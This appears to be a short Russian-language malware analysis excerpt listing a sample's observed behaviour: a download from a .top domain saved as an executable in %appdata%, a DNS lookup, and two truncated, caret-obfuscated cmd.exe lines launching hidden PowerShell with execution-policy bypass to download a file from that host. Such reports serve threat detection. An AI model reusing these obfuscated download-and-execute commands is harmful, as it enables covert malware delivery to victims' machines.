Техническая информация
- http://fooperight.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWeRs^Hell.^e^xE -EXecU^T^ioN^p^OLicy ^By^pA^s^s -^NOp^ROfI^lE -Wi^N^Do^wStY^LE^ ^hi^dden (nE^w^-^oB^j^EcT^ sY^sTE^M.^neT.WEb^cLIeNT).Do^W^Nl^OA^d^fI^L^E('http://fooperight.top...
- DNS ASK fo###right.top
- '<SYSTEM32>\cmd.exe' /c "pOWeRs^Hell.^e^xE -EXecU^T^ioN^p^OLicy ^By^pA^s^s -^NOp^ROfI^lE -Wi^N^Do^wStY^LE^ ^hi^dden (nE^w^-^oB^j^EcT^ sY^sTE^M.^neT.WEb^cLIeNT).Do^W^Nl^OA^d^fI^L^E('http://fooperight.top...' (со скрытым окном)